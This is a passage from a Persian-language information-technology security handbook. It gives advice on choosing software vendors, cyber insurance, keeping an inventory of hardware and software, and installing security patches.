‫ﺭﺍ ﻧﺎﺩﻳﺪﻩ ﻣﻲﮔﻴﺮﻧﺪ‪ ،‬ﻣﮕﺮ ﺁﻧﻜﻪ ﺍﻧﻌﻜﺎﺱ ﻣﻄﺒﻮﻋﺎﺗﻲ ﺁﻥ ﺑﺴﻴﺎﺭ ﻧﺎﻣﻄﻠﻮﺏ ﺑﺎﺷﺪ‪.‬‬
‫ﺑﺒﻴﻨﻴﺪ ﻓﺮﻭﺷﻨﺪﺓ ﻣﻮﺭﺩ ﻧﻈﺮ ﺑﻪ ﻃﺮﺍﺣﻲ ﻣﻨﺎﺳﺐ ﺑﺎ ﻣﻌﻴﺎﺭﻫﺎﻳﻲ ﭼﻮﻥ ﺍﻣﻨﻴﺖ‪ ،‬ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ‪ ،‬ﻭ ﻭﺍﺳـﻄﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﻣﻨﺎﺳـﺐ ﭼﻘـﺪﺭ‬ ‫•‬
‫ﺍﻫﻤﻴﺖ ﻣﻲﺩﻫﺪ‪ .‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻘﺎﻭﻡ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻼﺕ ﻭ ﺍﺷﺘﺒﺎﻫﺎﺕ ﻛﺎﺭﺑﺮ‪ ،‬ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺩ ﺩﺭ ﺷﺮﺍﻳﻂ ﺣﺴﺎﺱ ﻣﻨﺎﺳﺒﺘﺮ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﻣﺸﺨﺺ ﻛﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ﺑﻬﺘﺮ ﺍﺳﺖ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻗﺪﻳﻤﻲ ﻛﻪ ﻣﺸﻜﻼﺕ ﺁﻧﻬﺎ ﺗﻘﺮﻳﺒﹰﺎ ﻣﺸﺨﺺ ﻫﺴﺘﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨـﺪ‪ ،‬ﻳـﺎ‬ ‫•‬
‫ﺁﺧﺮﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﺎﺯﺍﺭ ﻛﻪ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺟﺪﻳﺪﺗﺮﻱ ﺩﺭ ﺁﻧﻬﺎ ﻋﺮﺿﻪ ﻣﻲﺷﻮﺩ ﺭﺍ ﺑﻜﺎﺭ ﺑﺮﺩ‪.‬‬
‫ﺳﻴﺴﺘﻤﻲ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴﺪ ﻛﻪ ﺑﺎ ﻛﻤﺘﺮﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ‪ ،‬ﺗﻤﺎﻡ ﻛﺎﺭﻫﺎﻳﻲ ﻛﻪ ﺷﻤﺎ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺭﺍ ﺑﻪ ﻧﺤﻮ ﺍﺣﺴﻦ ﺍﻧﺠﺎﻡ ﺩﻫﺪ‪ .‬ﺳﺨﺖﺍﻓﺰﺍﺭ ﻧـﺴﺒﺘﹰﺎ‬ ‫•‬
‫ﺍﺭﺯﺍﻥ ﺍﺳﺖ؛ ﻣﻤﻜﻦ ﺍﺳﺖ ﺧﺮﻳﺪ ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺠﺰﺍ ﺑﺮﺍﻱ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻥ ﺑﻪ ﻳﻚ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺣﺪﺍﻗﻠﻲ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏ‪ ،‬ﻧـﺴﺒﺖ‬
‫ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺸﺎﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ‪ -‬ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻨﺠﺮ ﺑﻪ ﺑﺮﻭﺯ ﻧﻘﺼﻬﺎﻱ ﺍﻧﺒﻮﻩ‬
‫ﺷﻮﺩ ‪ -‬ﮔﺰﻳﻨﺔ ﺑﻬﺘﺮﻱ ﺑﺎﺷﺪ‪.‬‬

‫ﺩﺭ ﺍﻳﻨﺠﺎ ﺑﻪ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺑﺮﺍﻱ ﺧﺮﻳﺪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻭ ﺳﻴﺴﺘﻤﻬﺎ ﻻﺯﻡ ﻫﺴﺘﻨﺪ ﺍﺷﺎﺭﻩ ﻣﻲﺷﻮﺩ‪:‬‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺻﺤﻴﺢ ﺍﻟﮕﻮﻫﺎﻱ ﻣﻮﻓﻖ ﻣﻬﻨﺪﺳﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺭ ﻃﺮﺍﺣﻲ‪ ،‬ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ‪ ،‬ﻭ ﺁﺯﻣﺎﻳﺶ ﻧﺮﻡﺍﻓﺰﺍﺭ‪.‬‬ ‫•‬

‫ﻣﺴﺘﻨﺪﺍﺗﻲ ﻛﻪ ﻧﺘﺎﻳﺞ ﺁﺯﻣﺎﻳﺶ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺭ ﻣﺤﻴﻄﻬﺎﻱ ﻣﺸﺎﺑﻪ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﺭﺍ ﻧﺸﺎﻥ ﺩﻫﻨﺪ‪ .‬ﺩﺭ ﺣﺎﻟﺖ ﺍﻳﺪﻩﺁﻝ‪ ،‬ﺍﻳﻦ ﺁﺯﻣﺎﻳﺶ ﺑﺎﻳـﺪ ﻫـﻢ‬ ‫•‬
‫ﺷﺎﻣﻞ ﺁﺯﻣﻮﻥ ﻋﻤﻠﻜﺮﺩ ﻭ ﻫﻢ ﺷﺎﻣﻞ ﺁﺯﻣﻮﻥ ﻛﺎﺭﺁﻳﻲ ﺩﺭ ﺷﺮﺍﻳﻂ ﺑﺤﺮﺍﻧﻲ ﺑﺎﺷﺪ‪.‬‬
‫ﻳﻚ ﮔﺰﺍﺭﺵ ﻣﻜﺘﻮﺏ ﺍﺯ ﺳﻴﺎﺳﺖ ﻓﺮﻭﺷﻨﺪﻩ ﺑﺮﺍﻱ ﭘﺬﻳﺮﺵ‪ ،‬ﻣﺴﺘﻨﺪ ﻛﺮﺩﻥ‪ ،‬ﻭ ﻭﺍﻛﻨﺶ ﺑﻪ ﮔﺰﺍﺭﺷﺎﺕ ﺩﺭﻳﺎﻓﺘﻲ ﺍﺯ ﺍﺷﻜﺎﻻﺕ ﻣﺤﺼﻮﻝ‪.‬‬ ‫•‬

‫ﻳﻚ ﮔﺰﺍﺭﺵ ﻣﻜﺘﻮﺏ ﺍﺯ ﺧﻂﻣﺸﻲ ﻓﺮﻭﺷﻨﺪﻩ ﺩﺭ ﺍﻋﻼﻡ ﺍﺷﻜﺎﻻﺕ ﺟﺪﻳﺪ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﻣﺸﺘﺮﻳﺎﻥ ﻭ ﻓﺮﺁﻳﻨﺪ ﺭﻓـﻊ ﺁﻧﻬـﺎ‪) .‬ﻣـﺴﺌﻮﻟﻴﺖﭘـﺬﻳﺮﺗﺮﻳﻦ‬ ‫•‬
‫ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺗﻴﻤﻬﺎﻱ ‪ FIRST‬ﻭ ﻓﻬﺮﺳﺘﻬﺎﻱ ﭘﺴﺘﻲ ﻣﺸﺘﺮﻳﺎﻥ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﻭ ﻓﺮﻭﺷﻨﺪﮔﺎﻧﻲ ﻛﻪ ﺍﺣﺴﺎﺱ ﻣﺴﺌﻮﻟﻴﺖ ﻛﻤﺘـﺮﻱ ﻣـﻲﻛﻨﻨـﺪ‬
‫ﻫﻴﭽﮕﺎﻩ ﺍﺷﻜﺎﻻﺕ ﻭ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺭﻓﻊ ﺁﻧﻬﺎ ﺭﺍ ﺍﻃﻼﻉ ﻧﻤﻲﺩﻫﺪ ﻭ ﻳﺎ ﺩﺭ ﻛﻨﺎﺭ ﺍﺷﻜﺎﻻﺕ ﺍﻋﻼﻡﺷﺪﺓ ﺳﺎﻳﺮ ﺑﺮﻧﺎﻣﻪﻫﺎ‪ ،‬ﺍﺷﻜﺎﻻﺕ ﺭﺍ ﺩﺭ ﻣﻜﺎﻧﻬـﺎﻱ ﻣـﺒﻬﻢ ﻭ ﻏﻴﺮﻗﺎﺑـﻞ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﭘﻨﻬﺎﻥ ﻣﻲﻛﻨﻨﺪ‪(.‬‬
‫ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺯ ﺍﻃﻼﻋﻴﻪﻫﺎﻱ ﭘﻴﺸﻴﻦ ﻭ ﺍﺷﻜﺎﻻﺕ ﺭﻓﻊﺷﺪﻩ‪.‬‬ ‫•‬
‫‪٣٥١‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺍﮔﺮﭼﻪ ﺻﻨﻌﺖ ﺭﺍﻳﺎﻧﻪ ﻣﺪﺕ ﺍﻧﺪﻛﻲ ﺍﺳﺖ ﻛﻪ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ ﺭﺍ ﺟﺪﻱ ﻣﻲﮔﻴﺮﺩ‪ ،‬ﺍﻣﺎ ﻫـﻴﭻ ﻓﺮﻭﺷـﻨﺪﻩﺍﻱ ‪ -‬ﺣﺘـﻲ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﻣﺤـﺼﻮﻻﺕ‬
‫ﺍﻣﻨﻴﺘﻲ ﻫﻢ ‪ -‬ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺑﺮﺍﺑﺮ ﺁﺳﻴﺒﻬﺎﻱ ﻧﺎﺷﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺑﻴﻤﻪ ﻧﻤﻲﻛﻨﻨـﺪ‪ .‬ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﺗﻨﻬـﺎ ﺗﻌـﺪﺍﺩ ﺍﻧـﺪﻛﻲ ﺍﺯ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﺑﻴﻤﻪ‪ ،‬ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺗﻨﻈﻴﻢ ﺑﻴﻤﻪﻧﺎﻣﻪﻫﺎﻳﻲ ﺩﺭ ﻗﺒﺎﻝ ﺧﻄﺮﺍﺕ ﻧﺎﺷﻲ ﺍﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﺗﻐﻴﻴـﺮﺍﺕ ﻧﺎﺧﻮﺍﺳـﺘﺔ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﻭﺏ‬
‫ﺗﺪﻭﻳﻦ ﻛﺮﺩﻩﺍﻧﺪ‪ .‬ﺷﻤﺎ ﺑﺎﻳﺪ ﺍﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﺗﺎ ﻣﺘﻮﺟﻪ ﺷﻮﻳﺪ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺘﻔﺎﻭﺕ‪ ،‬ﭼﻪ ﺑﻴﻤﻪﻧﺎﻣﻪﻫـﺎﻳﻲ ﻭﺟـﻮﺩ‬
‫ﺩﺍﺭﺩ‪ .‬ﻫﺮﭼﻪ ﺯﻣﺎﻥ ﺑﻴﺸﺘﺮﻱ ﺑﮕﺬﺭﺩ‪ ،‬ﺑﻴﻤﻪﻧﺎﻣﻪﻫﺎ ﺑﺮﺍﻱ ﻛﺎﺭﺁﺗﺮ ﺑﻮﺩﻥ ﺩﺭ ﭘﻴﻜﺮﺑﻨﺪﻳﻬﺎﻳﻲ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﻣﺨﺎﻃﺮﺍﺕ ﻛﻤﺘـﺮﻱ ﻣـﻲﺷـﻮﻧﺪ ﺗﻜﺎﻣـﻞ‬
‫‪١٩٨‬‬
‫ﻣﻲﻳﺎﺑﻨﺪ )ﻭ ﻟﺬﺍ ﻣﺸﺘﺮﻳﺎﻥ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺧﺪﻣﺎﺕ ﻣﺨﺘﻠﻒ ﺁﻧﺎﻥ ﺣﻖ ﺑﻴﻤﺔ ﻛﻤﺘﺮﻱ ﭘﺮﺩﺍﺧﺖ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ(‪.‬‬

‫ﺗﻬﻴﻪ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ‬


‫ﺯﻣﺎﻧﻴﻜﻪ ﻓﺮﻭﺷﻨﺪﻩ‪ ،‬ﺑﺴﺘﺮ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ‪ ،‬ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻮﺭﺩ ﻧﻈﺮ ﺧﻮﺩ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻛﺮﺩﻳﺪ‪ ،‬ﺑﺎﻳﺪ ﻫﻤﻪ ﭼﻴﺰ ﺭﺍ ﻧﺼﺐ ﻭ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ‪ .‬ﻓﺮﺁﻳﻨﺪ ﻧـﺼﺐ‬
‫ﺑﺮﻧﺎﻣﻪ ﻳﻚ ﻓﺮﺁﻳﻨﺪ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺍﺳﺖ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﺷﺘﺒﺎﻫﺎﺗﻲ ﻛﻪ ﻃﻲ ﻧﺼﺐ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺭﺥ ﻣﻲﺩﻫﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺯﻣـﺎﻧﻲ ﺁﺷـﻜﺎﺭ ﺷـﻮﻧﺪ‬
‫ﻛﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺑﺮﺧﻂ ﺷﺪﻩ ﻭ ﻳﺎ ﺩﺭﺣﺎﻝ ﺍﻧﺠﺎﻡ ﻗﺴﻤﺖ ﺳﻨﮕﻴﻦ ﻛﺎﺭ ﻳﻚ ﭘﺮﻭﮊﻩ ﺍﺳﺖ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﺮﺍﻱ ﻓﺮﺁﻳﻨﺪ ﻧﺼﺐ ﺑﻪ ﺍﻧـﺪﺍﺯﺓ ﻛـﺎﻓﻲ ﻭﻗـﺖ‬
‫ﺍﺧﺘﺼﺎﺹ ﺩﻫﻴﺪ ﻭ ﺩﺭ ﻣﻮﺭﺩ ﺻﺤﺖ ﺁﻥ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ‪.‬‬

‫ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺸﺎﺑﻪ ﺳﻴﺴﺘﻢ ﺍﻧﺒﺎﺭﺩﺍﺭﻱ‬


‫ﺗﻤﺎﻡ ﻧﻜﺎﺕ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﻓﻬﺮﺳﺖ ﻛﻨﻴﺪ‪ .‬ﺷﻤﺎﺭﻩﻫﺎﻱ ﺳـﺮﻱ‪ ،‬ﻣﻘـﺪﺍﺭ ﺣﺎﻓﻈـﻪ‪ ،‬ﺍﻧـﻮﺍﻉ ﭘﺮﺩﺍﺯﺷـﮕﺮﻫﺎ‪ ،‬ﻛﺎﺭﺗﻬـﺎﻱ ﺟـﺎﻧﺒﻲ ﻭ ﺳـﺎﻳﺮ ﺍﺟـﺰﺍﻱ‬
‫ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺭﺍ ﺑﻪ ﺛﺒﺖ ﺑﺮﺳﺎﻧﻴﺪ‪ .‬ﺍﺯ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺣﺪﺍﻗﻞ ﺩﺭ ﺩﻭ ﻣﻜﺎﻥ ﻣﺘﻔﺎﻭﺕ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻧﻤﺎﻳﻴﺪ ‪ -‬ﻳﻚ ﺭﺍﻩ ﺳـﺎﺩﻩ ﺑـﺮﺍﻱ‬
‫ﻼ ﻣﻨﺰﻟﺘﺎﻥ ‪ -‬ﻣﻨﺘﻘﻞ ﻛﻨﻴـﺪ‪.‬‬
‫ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻓﺎﻳﻞ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﭘﺲ ﺍﺯ ﺗﻜﻤﻴﻞ‪ ،‬ﺍﺯ ﻃﺮﻳﻖ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻪ ﻣﺤﻠﻲ ﺩﻳﮕﺮ ‪ -‬ﻣﺜ ﹰ‬
‫ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺯﻣﺎﻧﻲ ﺑﻪ ﻛﺎﺭ ﺧﻮﺍﻫﻨﺪ ﺁﻣﺪ ﻛﻪ ﺑﺨﻮﺍﻫﻴﺪ ﺟﻨﺒﻪﻫﺎﻱ ﻣﺮﺗﺒﻂ ﺑﺎ ﻛﺎﺭﺁﻳﻲ ﺭﺍ ﺍﻧﺪﺍﺯﻩﮔﻴﺮﻱ ﻧﻤﺎﻳﻴﺪ‪ .‬ﭼﻨﺎﻧﭽﻪ ﺩﺭ ﻣﻌـﺮﺽ ﺩﺯﺩﻱ ﻭ ﻳـﺎ‬
‫ﺁﺳﻴﺐ ﻧﻴﺰ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﺪ‪ ،‬ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﺑﺮﺁﻭﺭﺩﻥ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺷﺮﻛﺖ ﺑﻴﻤﻪ ﻧﻴﺰ ﺑﻜﺎﺭ ﺧﻮﺍﻫﻨﺪ ﺁﻣﺪ‪.‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺭﺍ ﻧﻴﺰ ﺑﺎﻳﺪ ﻓﻬﺮﺳﺖ ﻛﻨﻴﺪ‪ .‬ﺑﺮﺍﻱ ﻫﺮ ﻧﺮﻡﺍﻓﺰﺍﺭ‪ ،‬ﻣﻮﺍﺭﺩﻱ ﭼﻮﻥ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﻩ‪ ،‬ﻧﺴﺨﺔ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ‪ ،‬ﻭ ﺗﺎﺭﻳﺦ ﺍﻧﺘـﺸﺎﺭ‬
‫ﺭﺍ ﺛﺒﺖ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﮔﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺩﺍﺭﻳﺪ ﻛﻪ ﺑﺎ ﻛﺪﻫﺎﻱ ﻓﻌﺎﻝﻛﻨﻨﺪﻩ ﻫﻤﺮﺍﻩ ﺍﺳﺖ‪ ،‬ﺛﺒﺖ ﺍﻳﻦ ﻛﺪﻫﺎ ﻧﻴﺰ ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺍﮔﺮ ﻛﺪﻫﺎﻱ‬
‫ﻓﻌﺎﻝﻛﻨﻨﺪﻩ ﺭﺍ ﺛﺒﺖ ﻛﻨﻴﺪ‪ ،‬ﺑﺎﻳﺪ ﺍﺯ ﺍﻳﻤﻦ ﺑﻮﺩﻥ ﺁﻥ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ؛ ﭼﺮﺍﻛﻪ ﺍﻧﺘﺸﺎﺭ ﺧﻮﺍﺳﺘﻪ ﻳﺎ ﻧﺎﺧﻮﺍﺳﺘﺔ ﻛﺪﻫﺎﻱ ﻓﻌﺎﻝﻛﻨﻨـﺪﻩ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺍﺯ‬
‫ﻧﻈﺮ ﺑﺮﺧﻲ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺑﻌﻨﻮﺍﻥ ﺳﺮﻗﺖ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺗﻠﻘﻲ ﺷﻮﺩ‪.‬‬
‫ﺍﺯ ﻛﻠﻴﺔ ﻣﺤﺘﻮﻳﺎﺕ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺷﺎﻣﻞ ﺩﻳﺴﻚ ﺑﺮﻧﺎﻣﻪ‪ ،‬ﻣﺴﺘﻨﺪﺍﺕ ﻛﺎﺭ ﺑﺎ ﺁﻥ ﻭ ﺍﻃﻼﻋﺎﺕ ﺩﻳﮕﺮﻱ ﻛﻪ ﺑﺮﺍﻱ ﻛﺎﺭ ﺑﺎ ﺭﺍﻳﺎﻧـﻪ ﻭ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﻻﺯﻡ‬
‫ﻫﺴﺘﻨﺪ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﻗﺮﺍﺭ ﺍﺳﺖ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺩﺳﺘﮕﺎﻫﻬﺎ ﺟﺎﻳﮕﺰﻳﻦ ﺷﻮﻧﺪ ﻭ ﻳﺎ ﻧﻴﺎﺯ ﺑﻪ ﺟﺎﺑﺠﺎﻳﻲ ﺁﻧﻬﺎ ﺩﺍﺭﻳﺪ‪ ،‬ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻲ ﺑﻪﻇﺎﻫﺮ ﻣﻄﻤﺌﻦ ﻗﺮﺍﺭ ﻣـﻲﺩﻫﻨـﺪ ﺑـﺴﻴﺎﺭ ﺯﻳـﺎﺩ‬ ‫ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺗﻌﺪﺍﺩ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺣﻴﺎﺗﻲ ﺑﺮﺍﻱ ﻛﺎﺭ ﺭﺍ ﺗﻨﻬﺎ ﺭﻭﻱ ﻧﺴﺨﻪﻫﺎﻱ ﭼﺎﭘ ﹺ‬
‫ﻻ ﺁﺧﺮﻳﻦ ﺛﺒﺘﻬﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﺓ ﭘﻴﺶ ﺍﺯ ﻭﻗﻮﻉ ﻳﻚ ﺭﺧﺪﺍﺩ‪ ،‬ﺍﺧﻄﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻫﺴﺘﻨﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﻪ ﻫﻤـﺔ ﺑﺮﮔـﻪﻫـﺎﻱ ﺛﺒﺘـﻲ ﻛـﻪ‬ ‫ﺍﺳﺖ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﺑﻮﺳﻴﻠﺔ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻳﺎ ﺳﺨﺖﺍﻓﺰﺍﺭ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ ﻳﻚ ﻧﮕﺎﻩ ﺍﺟﻤﺎﻟﻲ ﺑﻴﺎﻧﺪﺍﺯﻳﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻧﻜﺘﻪﺍﻱ ﺍﺯ ﻗﻠﻢ ﻧﻴﺎﻓﺘﺎﺩﻩ ﺍﺳﺖ‪.‬‬

‫ﻧﺼﺐ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻭ ﻭﺻﻠﻪﻫﺎﻱ ﺁﻥ‬


‫ﭘﻴﺶ ﺍﺯ ﺍﻳﻨﻜﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﺍ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﻧﺼﺐ ﻛﻨﻴﺪ‪ ،‬ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻓﺮﻭﺷﻨﺪﺓ ﺁﻧﺮﺍ ﺑﺮﺭﺳﻲ ﻧﻤﺎﻳﻴﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻠﻴﺔ ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻭ‬
‫ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺭﻓﻊ ﺍﺷﻜﺎﻝ ﺁﻥ ﻧﺴﺨﻪ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﻧﺼﺐ ﻛﻨﻴﺪ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻳﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺧﻮﺍﻧﺪﻥ ﻧﻜﺎﺕ ﻭﻳﮋﺓ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻭﺻﻠﻪﻫﺎﻱ ﺁﻥ ﻧﻴﺰ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺼﻮﺭﺗﻲ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﺎﻳﺪ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ‬
‫ﻳﻚ ﺭﻭﺵ ﻭﻳﮋﻩ ﻧﺼﺐ ﻛﺮﺩ ﻭ ﻧﺼﺐ ﺍﻳﻦ ﻭﺻﻠﻪﻫﺎ ﺑﻪ ﻃﺮﻕ ﺩﻳﮕﺮ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺑﺮﻭﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻨﺠﺮ ﺷﻮﺩ‪.‬‬

‫‪ ۱۹۸‬ﺩﺭ ﺍﻭﺍﺧﺮ ﺳﺎﻝ ‪ ،۲۰۰۱‬ﺣﺪﺍﻗﻞ ﻳﻚ ﺷﺮﻛﺖ ﺑﻴﻤﻪ ﺍﺯ ﻣﺸﺘﺮﻳﺎﻧﻲ ﻛﻪ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﺑﺎ ﺑﺴﺘﺮ ‪ Windows NT‬ﻭ ‪ Microsoft IIS‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩﻧﺪ‪ ،‬ﺣﻖ ﺑﻴﻤﺔ‬
‫ﺑﻴﺸﺘﺮﻱ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﺮﺩ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٥٢‬‬

